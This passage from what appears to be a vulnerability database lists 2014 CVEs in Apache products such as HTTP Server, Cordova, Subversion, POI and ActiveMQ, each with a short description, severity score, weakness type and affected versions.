apache tomcat 7.0.14
apache tomcat 7.0.49
apache tomcat 8.0.1
apache tomcat 7.0.10
apache tomcat 7.0.26
apache tomcat 6.0.0
apache tomcat 6.0.16
apache tomcat 6.0.11
apache tomcat 7.0.2
apache tomcat 6.0.19
apache tomcat 7.0.52
apache tomcat 6.0.9
apache tomcat 7.0.22
apache tomcat 6.0.35
CVE-2014-0231 MEDIUM

The mod_cgid module in the Apache HTTP Server before 2.4.10 does not have a timeout mechanism, which allows remote attackers to cause a denial of service (process hang) via a request to a CGI script that does not read from its stdin file descriptor.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-399,

Products Affected

Vendor Product Version
apache http_server *
CVE-2014-0232 MEDIUM

Multiple cross-site scripting (XSS) vulnerabilities in framework/common/webcommon/includes/messages.ftl in Apache OFBiz 11.04.01 before 11.04.05 and 12.04.01 before 12.04.04 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors, which are not properly handled in a (1) result or (2) error message.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache ofbiz 11.04.03
apache ofbiz 11.04.01
apache ofbiz 11.04.04
apache ofbiz 12.04.03
apache ofbiz 12.04.02
apache ofbiz 11.04.02
apache ofbiz 12.04.01
CVE-2014-10022 MEDIUM

Apache Traffic Server before 5.1.2 allows remote attackers to cause a denial of service via unspecified vectors, related to internal buffer sizing.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-119,

Products Affected

Vendor Product Version
apache traffic_server *
CVE-2014-1881 HIGH

Apache Cordova 3.3.0 and earlier and Adobe PhoneGap 2.9.0 and earlier allow remote attackers to bypass intended device-resource restrictions of an event-based bridge via a crafted library clone that leverages IFRAME script execution and waits a certain amount of time for an OnJsPrompt handler return value as an alternative to correct synchronization.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-264,

Products Affected

Vendor Product Version
adobe phonegap *
apache cordova 3.2.0
adobe phonegap 2.7.0
apache cordova 3.1.0
adobe phonegap 2.1.0
adobe phonegap 2.0.0
adobe phonegap 2.4.0
apache cordova 3.0.0
apache cordova 3.3.0
adobe phonegap 2.8.1
adobe phonegap 2.8.0
adobe phonegap 2.6.0
adobe phonegap 2.5.0
adobe phonegap 2.2.0
adobe phonegap 2.3.0
adobe phonegap 2.9.0
apache cordova *
CVE-2014-1882 HIGH

Apache Cordova 3.3.0 and earlier and Adobe PhoneGap 2.9.0 and earlier allow remote attackers to bypass intended device-resource restrictions of an event-based bridge via a crafted library clone that leverages IFRAME script execution and directly accesses bridge JavaScript objects, as demonstrated by certain cordova.require calls.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-264,

Products Affected

Vendor Product Version
adobe phonegap *
apache cordova 3.2.0
adobe phonegap 2.7.0
apache cordova 3.1.0
adobe phonegap 2.1.0
adobe phonegap 2.0.0
adobe phonegap 2.4.0
apache cordova 3.0.0
apache cordova 3.3.0
adobe phonegap 2.8.1
adobe phonegap 2.8.0
adobe phonegap 2.6.0
adobe phonegap 2.5.0
adobe phonegap 2.2.0
adobe phonegap 2.3.0
adobe phonegap 2.9.0
apache cordova *
CVE-2014-1884 HIGH

Apache Cordova 3.3.0 and earlier and Adobe PhoneGap 2.9.0 and earlier on Windows Phone 7 and 8 do not properly restrict navigation events, which allows remote attackers to bypass intended device-resource restrictions via content that is accessed (1) in an IFRAME element or (2) with the XMLHttpRequest method by a crafted application.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-264,

Products Affected

Vendor Product Version
adobe phonegap *
apache cordova 3.2.0
adobe phonegap 2.7.0
apache cordova 3.1.0
adobe phonegap 2.1.0
adobe phonegap 2.0.0
adobe phonegap 2.4.0
apache cordova 3.0.0
apache cordova 3.3.0
adobe phonegap 2.8.1
adobe phonegap 2.8.0
adobe phonegap 2.6.0
adobe phonegap 2.5.0
adobe phonegap 2.2.0
adobe phonegap 2.3.0
adobe phonegap 2.9.0
apache cordova *
CVE-2014-1972 HIGH

Apache Tapestry before 5.3.6 relies on client-side object storage without checking whether a client has modified an object, which allows remote attackers to cause a denial of service (resource consumption) or execute arbitrary code via crafted serialized data.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-399,

Products Affected

Vendor Product Version
apache tapestry *
CVE-2014-2668 MEDIUM

Apache CouchDB 1.5.0 and earlier allows remote attackers to cause a denial of service (CPU and memory consumption) via the count parameter to /_uuids.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache couchdb *
CVE-2014-3500 MEDIUM

Apache Cordova Android before 3.5.1 allows remote attackers to change the start page via a crafted intent URL.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-17,

Products Affected

Vendor Product Version
apache cordova *
CVE-2014-3501 MEDIUM

Apache Cordova Android before 3.5.1 allows remote attackers to bypass the HTTP whitelist and connect to arbitrary servers by using JavaScript to open WebSocket connections through WebView.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-254,

Products Affected

Vendor Product Version
apache cordova 3.5.0
CVE-2014-3502 MEDIUM

Apache Cordova Android before 3.5.1 allows remote attackers to open and send data to arbitrary applications via a URL with a crafted URI scheme for an Android intent.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache cordova 3.5.0
CVE-2014-3503 MEDIUM

Apache Syncope 1.1.x before 1.1.8 uses weak random values to generate passwords, which makes it easier for remote attackers to guess the password via a brute force attack.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-310,

Products Affected

Vendor Product Version
apache syncope 1.1.7
apache syncope 1.1.2
apache syncope 1.1.1
apache syncope 1.1.3
apache syncope 1.1.4
apache syncope 1.1.6
apache syncope 1.1.0
apache syncope 1.1.5
CVE-2014-3504 MEDIUM

The (1) serf_ssl_cert_issuer, (2) serf_ssl_cert_subject, and (3) serf_ssl_cert_certificate functions in Serf 0.2.0 through 1.3.x before 1.3.7 does not properly handle a NUL byte in a domain name in the subject's Common Name (CN) field of an X.509 certificate, which allows man-in-the-middle attackers to spoof arbitrary SSL servers via a crafted certificate issued by a legitimate Certification Authority.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
serf_project serf 1.0.3
apache subversion 1.4.0
apache subversion 1.6.18
serf_project serf 0.6.0
apache subversion 1.8.0
apache subversion 1.8.8
apache subversion 1.6.6
apache subversion 1.5.3
serf_project serf 0.6.1
serf_project serf 0.3.0
apache subversion 1.6.11
apache subversion 1.7.11
apache subversion 1.5.0
apache subversion 1.5.1
apache subversion 1.6.2
serf_project serf 1.0.2
apache subversion 1.7.4
apache subversion 1.5.6
serf_project serf 1.3.5
apache subversion 1.6.17
serf_project serf 0.7.2
apache subversion 1.8.6
serf_project serf 1.2.1
apache subversion 1.4.3
serf_project serf 1.1.1
serf_project serf 1.2.0
apache subversion 1.6.20
apache subversion 1.7.5
serf_project serf 0.7.1
apache subversion 1.6.12
serf_project serf 0.3.1
serf_project serf 1.3.0
apache subversion 1.6.13
apache subversion 1.7.12
apache subversion 1.6.3
apache subversion 1.7.15
apache subversion 1.8.7
serf_project serf 1.3.4
apache subversion 1.6.5
apache subversion 1.5.8
apache subversion 1.6.15
serf_project serf 1.3.3
apache subversion 1.6.14
apache subversion 1.7.7
apache subversion 1.7.3
apache subversion 1.5.5
apache subversion 1.6.21
apache subversion 1.8.2
apache subversion 1.5.7
apache subversion 1.7.14
serf_project serf 0.7.0
apache subversion 1.8.4
apache subversion 1.8.9
serf_project serf 1.3.1
apache subversion 1.6.0
apache subversion 1.6.16
apache subversion 1.7.8
serf_project serf 1.0.1
apache subversion 1.5.2
apache subversion 1.8.1
canonical ubuntu_linux 12.04
apache subversion 1.6.4
apache subversion 1.6.8
apache subversion 1.6.9
serf_project serf 0.5.0
canonical ubuntu_linux 14.04
apache subversion 1.7.6
apache subversion 1.6.19
apache subversion 1.7.9
apache subversion 1.7.13
apache subversion 1.5.4
serf_project serf 1.0.0
apache subversion 1.6.23
apache subversion 1.7.16
apache subversion 1.4.2
apache subversion 1.4.6
apache subversion 1.7.1
apache subversion 1.8.5
apache subversion 1.4.5
serf_project serf 1.3.6
serf_project serf 0.2.0
apache subversion 1.6.7
apache subversion 1.8.3
apache subversion 1.4.4
apache subversion 1.7.10
serf_project serf 0.4.0
apache subversion 1.6.10
serf_project serf 1.3.2
apache subversion 1.6.1
apache subversion 1.7.17
apache subversion 1.7.0
apache subversion 1.7.2
serf_project serf 1.1.0
apache subversion 1.4.1
CVE-2014-3522 MEDIUM

The Serf RA layer in Apache Subversion 1.4.0 through 1.7.x before 1.7.18 and 1.8.x before 1.8.10 does not properly handle wildcards in the Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof servers via a crafted certificate.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-297,

Products Affected

Vendor Product Version
apache subversion 1.4.0
apache subversion 1.6.18
apache subversion 1.8.0
apache subversion 1.8.8
apache subversion 1.6.6
apache subversion 1.5.3
apache subversion 1.6.11
apache subversion 1.7.11
apache subversion 1.5.0
apache subversion 1.5.1
apache subversion 1.6.2
apache subversion 1.7.4
apple xcode 6.1.1
apache subversion 1.5.6
apache subversion 1.6.17
apache subversion 1.8.6
apache subversion 1.4.3
apache subversion 1.6.20
apache subversion 1.7.5
apache subversion 1.6.12
opensuse opensuse 12.3
apache subversion 1.6.13
apache subversion 1.7.12
apache subversion 1.6.3
apache subversion 1.7.15
apache subversion 1.8.7
apache subversion 1.6.5
apache subversion 1.5.8
apache subversion 1.6.15
apache subversion 1.6.14
apache subversion 1.7.7
apache subversion 1.7.3
apache subversion 1.5.5
apache subversion 1.6.21
apache subversion 1.8.2
apache subversion 1.5.7
apache subversion 1.7.14
apache subversion 1.8.4
apache subversion 1.8.9
apache subversion 1.6.0
apache subversion 1.6.16
apache subversion 1.7.8
apache subversion 1.5.2
apache subversion 1.8.1
canonical ubuntu_linux 12.04
apache subversion 1.6.4
apache subversion 1.6.8
apache subversion 1.6.9
canonical ubuntu_linux 14.04
apache subversion 1.7.6
opensuse opensuse 13.1
apache subversion 1.6.19
apache subversion 1.7.9
apache subversion 1.7.13
apache subversion 1.5.4
apache subversion 1.6.23
apache subversion 1.7.16
apache subversion 1.4.2
apache subversion 1.4.6
apache subversion 1.7.1
apache subversion 1.8.5
apache subversion 1.4.5
apache subversion 1.6.7
apache subversion 1.8.3
apache subversion 1.4.4
apache subversion 1.7.10
apache subversion 1.6.10
apache subversion 1.6.1
apache subversion 1.7.17
apache subversion 1.7.0
apache subversion 1.7.2
apache subversion 1.4.1
CVE-2014-3523 MEDIUM

Memory leak in the winnt_accept function in server/mpm/winnt/child.c in the WinNT MPM in the Apache HTTP Server 2.4.x before 2.4.10 on Windows, when the default AcceptFilter is enabled, allows remote attackers to cause a denial of service (memory consumption) via crafted requests.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-399,

Products Affected

Vendor Product Version
apache http_server 2.4.3
apache http_server 2.4.7
apache http_server 2.4.1
apache http_server 2.4.8
apache http_server 2.4.9
apache http_server 2.4.2
apache http_server 2.4.6
apache http_server 2.4.4
CVE-2014-3524 HIGH

Apache OpenOffice before 4.1.1 allows remote attackers to execute arbitrary commands and possibly have other unspecified impact via a crafted Calc spreadsheet.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-77,

Products Affected

Vendor Product Version
apache openoffice *
libreoffice libreoffice *
CVE-2014-3525 HIGH

Unspecified vulnerability in Apache Traffic Server 3.x through 3.2.5, 4.x before 4.2.1.1, and 5.x before 5.0.1 has unknown impact and attack vectors, possibly related to health checks.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache traffic_server 2.1.1
apache traffic_server 3.0.1
apache traffic_server 3.2.0
apache traffic_server 3.3.2
apache traffic_server 2.1.8
apache traffic_server 3.0.0
apache traffic_server 3.3.4
apache traffic_server 4.0.1
apache traffic_server 4.2.0
apache traffic_server 3.1.0
apache traffic_server 2.0.0
apache traffic_server 2.1.5
apache traffic_server 2.1.3
apache traffic_server 3.1.3
apache traffic_server 2.1.9
apache traffic_server 3.1.4
apache traffic_server 5.0.0
apache traffic_server 3.1.2
apache traffic_server 3.3.1
apache traffic_server 2.1.2
apache traffic_server 2.0.1
apache traffic_server 3.0.4
apache traffic_server 3.3.5
apache traffic_server 2.1.7
apache traffic_server 3.0.3
apache traffic_server 3.1.1
apache traffic_server 2.1.6
apache traffic_server 3.3.0
apache traffic_server 3.0.2
apache traffic_server 3.3.3
apache traffic_server 2.1.4
apache traffic_server 2.1.0
apache traffic_server 4.1.0
apache traffic_server 4.2.1
CVE-2014-3526 MEDIUM

Apache Wicket before 1.5.12, 6.x before 6.17.0, and 7.x before 7.0.0-M3 might allow remote attackers to obtain sensitive information via vectors involving identifiers for storing page markup for temporary user sessions.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache wicket 6.8.0
apache wicket 6.10.0
apache wicket 6.9.0
apache wicket 6.15.0
apache wicket *
apache wicket 6.7.0
apache wicket 6.2.0
apache wicket 6.1.0
apache wicket 6.5.0
apache wicket 7.0.0
apache wicket 6.3.0
apache wicket 6.6.0
apache wicket 6.9.1
apache wicket 6.12.0
apache wicket 6.1.1
apache wicket 6.4.0
apache wicket 6.13.0
apache wicket 6.11.0
apache wicket 6.14.0
apache wicket 6.0.0
apache wicket 6.16.0
CVE-2014-3528 MEDIUM

Apache Subversion 1.0.0 through 1.7.x before 1.7.17 and 1.8.x before 1.8.10 uses an MD5 hash of the URL and authentication realm to store cached credentials, which makes it easier for remote servers to obtain the credentials via a crafted authentication realm.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-255,

Products Affected

Vendor Product Version
apache subversion 1.8.0
apache subversion 1.5.0
apache subversion 1.5.1
apache subversion 1.6.2
redhat enterprise_linux_server 6.0
apache subversion 1.7.4
apple xcode 6.1.1
apache subversion 1.5.6
apache subversion 1.6.17
apache subversion 1.1.2
apache subversion 1.4.3
apache subversion 1.0.4
apache subversion 1.0.8
apache subversion 1.7.5
redhat enterprise_linux_desktop 6.0
apache subversion 1.6.12
apache subversion 1.6.13
apache subversion 1.0.0
apache subversion 1.6.3
redhat enterprise_linux_workstation 6.0
apache subversion 1.5.8
apache subversion 1.2.3
redhat enterprise_linux_server 7.0
apache subversion 1.7.3
apache subversion 1.0.5
apache subversion 1.5.5
apache subversion 1.6.21
apache subversion 1.7.14
apache subversion 1.8.9
apache subversion 1.6.0
apache subversion 1.5.2
apache subversion 1.6.8
apache subversion 1.2.1
apache subversion 1.7.6
apache subversion 1.7.13
apache subversion 1.6.23
apache subversion 1.7.16
apache subversion 1.4.6
apache subversion 1.6.7
apache subversion 1.4.4
apache subversion 1.3.0
apache subversion 1.7.10
apache subversion 1.6.10
apache subversion 1.0.3
apache subversion 1.6.1
apache subversion 1.7.17
apache subversion 1.7.0
apache subversion 1.7.2
apache subversion 1.4.0
apache subversion 1.6.18
apache subversion 1.3.2
apache subversion 1.8.8
redhat enterprise_linux_server_eus 6.6.z
apache subversion 1.6.6
redhat enterprise_linux_hpc_node 7.0
apache subversion 1.5.3
apache subversion 1.0.6
apache subversion 1.6.11
apache subversion 1.7.11
redhat enterprise_linux_hpc_node 6.0
apache subversion 1.0.2
apache subversion 1.0.7
apache subversion 1.3.1
apache subversion 1.8.6
apache subversion 1.6.20
apache subversion 1.1.4
opensuse opensuse 12.3
apache subversion 1.7.12
apache subversion 1.7.15
apache subversion 1.8.7
apache subversion 1.0.1
apache subversion 1.1.0
apache subversion 1.6.5
apache subversion 1.6.15
apache subversion 1.6.14
apache subversion 1.7.7
apache subversion 1.8.2
apache subversion 1.5.7
apache subversion 1.8.4
apache subversion 1.6.16
apache subversion 1.7.8
apache subversion 1.8.1
canonical ubuntu_linux 12.04
apache subversion 1.6.4
apache subversion 1.6.9
canonical ubuntu_linux 14.04
opensuse opensuse 13.1
apache subversion 1.0.9
apache subversion 1.6.19
apache subversion 1.7.9
redhat enterprise_linux_desktop 7.0
apache subversion 1.5.4
redhat enterprise_linux_workstation 7.0
apache subversion 1.1.3
apache subversion 1.4.2
apache subversion 1.7.1
apache subversion 1.8.5
apache subversion 1.2.0
apache subversion 1.4.5
apache subversion 1.8.3
apache subversion 1.1.1
apache subversion 1.2.2
apache subversion 1.4.1
CVE-2014-3529 MEDIUM

The OPC SAX setup in Apache POI before 3.10.1 allows remote attackers to read arbitrary files via an OpenXML file containing an XML external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache poi 3.0.1
apache poi 3.2
apache poi 0.13.0
apache poi 1.0.0
apache poi 1.8
apache poi 0.1
apache poi 1.0.1
apache poi 3.6
apache poi 0.4
apache poi 2.0
apache poi 3.0.2
apache poi 1.10
apache poi 0.2
apache poi *
apache poi 1.7
apache poi 0.7
apache poi 0.3
apache poi 0.5
apache poi 0.12.0
apache poi 3.5
apache poi 0.6
apache poi 3.0
apache poi 0.11.0
apache poi 1.5
apache poi 3.7
apache poi 0.14.0
apache poi 1.1.0
apache poi 3.8
apache poi 2.5.1
apache poi 1.0.2
apache poi 2.5
apache poi 3.9
apache poi 3.10
apache poi 1.2.0
apache poi 1.5.1
apache poi 3.1
apache poi 0.10.0
CVE-2014-3574 MEDIUM

Apache POI before 3.10.1 and 3.11.x before 3.11-beta2 allows remote attackers to cause a denial of service (CPU consumption and crash) via a crafted OOXML file, aka an XML Entity Expansion (XEE) attack.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache poi 3.0.1
apache poi 3.2
apache poi 0.13.0
apache poi 1.0.0
apache poi 1.8
apache poi 0.1
apache poi 1.0.1
apache poi 3.6
apache poi 0.4
apache poi 2.0
apache poi 3.0.2
apache poi 1.10
apache poi 0.2
apache poi *
apache poi 1.7
apache poi 0.7
apache poi 0.3
apache poi 0.5
apache poi 0.12.0
apache poi 3.5
apache poi 0.6
apache poi 3.0
apache poi 0.11.0
apache poi 1.5
apache poi 3.7
apache poi 0.14.0
apache poi 1.1.0
apache poi 3.8
apache poi 2.5.1
apache poi 1.0.2
apache poi 2.5
apache poi 3.9
apache poi 3.10
apache poi 1.2.0
apache poi 1.5.1
apache poi 3.1
apache poi 0.10.0
apache poi 3.11
CVE-2014-3575 MEDIUM

The OLE preview generation in Apache OpenOffice before 4.1.1 and OpenOffice.org (OOo) might allow remote attackers to embed arbitrary data into documents via crafted OLE objects.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache openoffice *
redhat enterprise_linux_desktop 7.0
libreoffice libreoffice *
redhat enterprise_linux_workstation 7.0
redhat enterprise_linux_server 7.0
CVE-2014-3576 MEDIUM

The processControlCommand function in broker/TransportConnection.java in Apache ActiveMQ before 5.11.0 allows remote attackers to cause a denial of service (shutdown) via a shutdown command.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-264,

Products Affected

Vendor Product Version
oracle fusion_middleware 9.0
oracle fusion_middleware 8.1
oracle fusion_middleware 12.1.3.0.0
apache activemq *
oracle business_intelligence_publisher 12.2.1.0.0
oracle fusion_middleware 11.1.1.7.4
CVE-2014-3577 MEDIUM

org.apache.http.conn.ssl.AbstractVerifier in Apache HttpComponents HttpClient before 4.3.5 and HttpAsyncClient before 4.0.2 does not properly verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via a "CN=" string in a field in the distinguished name (DN) of a certificate, as demonstrated by the "foo,CN=www.apache.org" string in the O field.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache httpclient *
apache httpasyncclient *
CVE-2014-3579 HIGH

XML external entity (XXE) vulnerability in Apache ActiveMQ Apollo 1.x before 1.7.1 allows remote consumers to have unspecified impact via vectors involving an XPath based selector when dequeuing XML messages.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-611,

Products Affected

Vendor Product Version
apache activemq_apollo 1.1
apache activemq_apollo 1.5
apache activemq_apollo 1.4
apache activemq_apollo 1.7
apache activemq_apollo 1.2
apache activemq_apollo 1.3
apache activemq_apollo 1.6
apache activemq_apollo 1.0
CVE-2014-3580 MEDIUM

The mod_dav_svn Apache HTTPD server module in Apache Subversion 1.x before 1.7.19 and 1.8.x before 1.8.11 allows remote attackers to cause a denial of service (NULL pointer dereference and server crash) via a REPORT request for a resource that does not exist.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache subversion 1.8.0
apache subversion 1.5.0
apache subversion 1.5.1
apache subversion 1.6.2
redhat enterprise_linux_server 6.0
apache subversion 1.7.19
apache subversion 1.7.4
apple xcode 6.1.1
apache subversion 1.5.6
apache subversion 1.6.17
apache subversion 1.1.2
apache subversion 1.4.3
apache subversion 1.0.4
apache subversion 1.0.8
apache subversion 1.7.5
redhat enterprise_linux_desktop 6.0
apache subversion 1.6.12
apache subversion 1.6.13
apache subversion 1.0.0
apache subversion 1.6.3
redhat enterprise_linux_workstation 6.0
apache subversion 1.5.8
apache subversion 1.2.3
redhat enterprise_linux_server 7.0
apache subversion 1.7.3
apache subversion 1.0.5
apache subversion 1.5.5
apache subversion 1.6.21
apache subversion 1.7.14
apache subversion 1.8.9
apache subversion 1.6.0
apache subversion 1.5.2
apache subversion 1.6.8
apache subversion 1.2.1
apache subversion 1.7.6
apache subversion 1.7.13
apache subversion 1.6.23
apache subversion 1.7.16
apache subversion 1.4.6
apache subversion 1.6.7
apache subversion 1.4.4
debian debian_linux 7.0
apache subversion 1.3.0
apache subversion 1.7.10
apache subversion 1.6.10
apache subversion 1.0.3
apache subversion 1.6.1
apache subversion 1.7.17
apache subversion 1.7.0
apache subversion 1.7.2
apache subversion 1.4.0
apache subversion 1.6.18
apache subversion 1.3.2
apache subversion 1.8.8
redhat enterprise_linux_server_eus 6.6.z
apache subversion 1.6.6
redhat enterprise_linux_hpc_node 7.0
apache subversion 1.5.3
apache subversion 1.0.6
apache subversion 1.6.11
apache subversion 1.7.11
redhat enterprise_linux_hpc_node 6.0
apache subversion 1.0.2
apache subversion 1.0.7
apache subversion 1.3.1
apache subversion 1.8.6
apache subversion 1.6.20
apache subversion 1.1.4
apache subversion 1.7.12
apache subversion 1.7.15
apache subversion 1.8.7
apache subversion 1.0.1
apache subversion 1.1.0
apache subversion 1.6.5
apache subversion 1.6.15
apache subversion 1.6.14
apache subversion 1.7.7
apache subversion 1.7.18
apache subversion 1.8.2
apache subversion 1.5.7
apache subversion 1.8.4
apache subversion 1.6.16
apache subversion 1.7.8
apache subversion 1.8.1
apache subversion 1.8.10
apache subversion 1.6.4
apache subversion 1.6.9
apache subversion 1.0.9
apache subversion 1.6.19
apache subversion 1.7.9
redhat enterprise_linux_desktop 7.0
apache subversion 1.5.4
redhat enterprise_linux_workstation 7.0
apache subversion 1.1.3
apache subversion 1.4.2
apache subversion 1.7.1
apache subversion 1.8.5
apache subversion 1.2.0
apache subversion 1.4.5
apache subversion 1.8.3
apache subversion 1.1.1
apache subversion 1.2.2
apache subversion 1.4.1
CVE-2014-3581 MEDIUM

The cache_merge_headers_out function in modules/cache/cache_util.c in the mod_cache module in the Apache HTTP Server before 2.4.11 allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via an empty HTTP Content-Type header.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-476,

Products Affected

Vendor Product Version
apache http_server 2.4.7
redhat enterprise_linux_server_aus 7.4
redhat enterprise_linux_server_tus 7.3
redhat enterprise_linux_server_tus 7.6
apache http_server 2.4.2
redhat enterprise_linux_eus 7.6
apache http_server 2.4.3
apache http_server 2.4.10
canonical ubuntu_linux 12.04
redhat enterprise_linux_eus 7.4
apache http_server 2.4.1
oracle enterprise_manager_ops_center 12.2.0
canonical ubuntu_linux 14.04
redhat enterprise_linux_desktop 7.0
oracle enterprise_manager_ops_center 12.2.1
redhat enterprise_linux_server_aus 7.6
redhat enterprise_linux_server_aus 7.3
redhat enterprise_linux_eus 7.7
oracle linux 6
canonical ubuntu_linux 10.04
redhat enterprise_linux_eus 7.3
redhat enterprise_linux_eus 7.5
apache http_server 2.4.6
apache http_server 2.4.4
redhat enterprise_linux_server_aus 7.7
redhat enterprise_linux_server_tus 7.7
oracle enterprise_manager_ops_center 12.3.0
apache http_server 2.4.9
canonical ubuntu_linux 14.10
oracle enterprise_manager_ops_center *
redhat enterprise_linux_server 7.0
CVE-2014-3582 HIGH

In Ambari 1.2.0 through 2.2.2, it may be possible to execute arbitrary system commands on the Ambari Server host while generating SSL certificates for hosts in an Ambari cluster.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-94,

Products Affected

Vendor Product Version
apache ambari *
CVE-2014-3583 MEDIUM

The handle_headers function in mod_proxy_fcgi.c in the mod_proxy_fcgi module in the Apache HTTP Server 2.4.10 allows remote FastCGI servers to cause a denial of service (buffer over-read and daemon crash) via long response headers.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-119,

Products Affected

Vendor Product Version
apple os_x_server 5.0.3
apple mac_os_x 10.10.2
canonical ubuntu_linux 10.04
apple mac_os_x 10.10.0
apple mac_os_x 10.10.1
apache http_server 2.4.10
canonical ubuntu_linux 12.04
apple mac_os_x 10.10.4
apple mac_os_x 10.9.5
canonical ubuntu_linux 14.04
apple mac_os_x 10.10.3
canonical ubuntu_linux 14.10
CVE-2014-3584 MEDIUM

The SamlHeaderInHandler in Apache CXF before 2.6.11, 2.7.x before 2.7.8, and 3.0.x before 3.0.1 allows remote attackers to cause a denial of service (infinite loop) via a crafted SAML token in the authorization header of a request to a JAX-RS service.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-399,

Products Affected

Vendor Product Version
apache cxf 2.7.0
apache cxf 2.6.1
apache cxf 2.7.5
apache cxf 2.7.7
apache cxf 2.7.1
apache cxf *
apache cxf 3.0.0
apache cxf 2.7.3
apache cxf 2.7.2
apache cxf 2.7.4
apache cxf 2.7.6
CVE-2014-3596 MEDIUM

The getCN function in Apache Axis 1.4 and earlier does not properly verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via a certificate with a subject that specifies a common name in a field that is not the CN field. NOTE: this issue exists because of an incomplete fix for CVE-2012-5784.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache axis 1.1
apache axis 1.2.1
apache axis 1.2
apache axis *
apache axis 1.3
apache axis 1.0
CVE-2014-3600 HIGH

XML external entity (XXE) vulnerability in Apache ActiveMQ 5.x before 5.10.1 allows remote consumers to have unspecified impact via vectors involving an XPath based selector when dequeuing XML messages.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-611,

Products Affected

Vendor Product Version
apache activemq 5.6.0
apache activemq 5.3.1
apache activemq 5.4.2
apache activemq 5.8.0
apache activemq 5.9.0
apache activemq 5.5.0
apache activemq 5.4.0
apache activemq 5.4.3
apache activemq 5.1.0
apache activemq 5.3.2
apache activemq 5.3.0
apache activemq 5.0.0
apache activemq 5.10.0
apache activemq 5.5.1
apache activemq 5.7.0
apache activemq 5.2.0
apache activemq 5.4.1
apache activemq 5.9.1
CVE-2014-3612 HIGH

The LDAPLoginModule implementation in the Java Authentication and Authorization Service (JAAS) in Apache ActiveMQ 5.x before 5.10.1 allows remote attackers to bypass authentication by logging in with an empty password and valid username, which triggers an unauthenticated bind. NOTE: this identifier has been SPLIT per ADT2 due to different vulnerability types. See CVE-2015-6524 for the use of wildcard operators in usernames.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-287,

Products Affected

Vendor Product Version
apache activemq 5.6.0
apache activemq 5.3.1
apache activemq 5.4.2
apache activemq 5.8.0
apache activemq 5.9.0
apache activemq 5.5.0
apache activemq 5.4.0
apache activemq 5.4.3
apache activemq 5.1.0
apache activemq 5.3.2
apache activemq 5.3.0
apache activemq 5.0.0
apache activemq 5.10.0
apache activemq 5.5.1
apache activemq 5.7.0
apache activemq 5.2.0
apache activemq 5.4.1
apache activemq 5.9.1
CVE-2014-3623 MEDIUM

Apache WSS4J before 1.6.17 and 2.x before 2.0.2, as used in Apache CXF 2.7.x before 2.7.13 and 3.0.x before 3.0.2, when using TransportBinding, does not properly enforce the SAML SubjectConfirmation method security semantics, which allows remote attackers to conduct spoofing attacks via unspecified vectors.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-287,

Products Affected

Vendor Product Version
apache cxf *
apache wss4j *
CVE-2014-3624 HIGH

Apache Traffic Server 5.1.x before 5.1.1 allows remote attackers to bypass access restrictions by leveraging failure to properly tunnel remap requests using CONNECT.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-284,

Products Affected

Vendor Product Version
apache traffic_server 5.1.0
CVE-2014-3627 MEDIUM

The YARN NodeManager daemon in Apache Hadoop 0.23.0 through 0.23.11 and 2.x before 2.5.2, when using Kerberos authentication, allows remote cluster users to change the permissions of certain files to world-readable via a symlink attack in a public tar archive, which is not properly handled during localization, related to distributed cache.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-59,

Products Affected

Vendor Product Version
apache hadoop 2.0.5
apache hadoop 2.4.1
apache hadoop 0.23.4
apache hadoop 0.23.3
apache hadoop 2.0.2
apache hadoop 0.23.8
apache hadoop 2.5.0
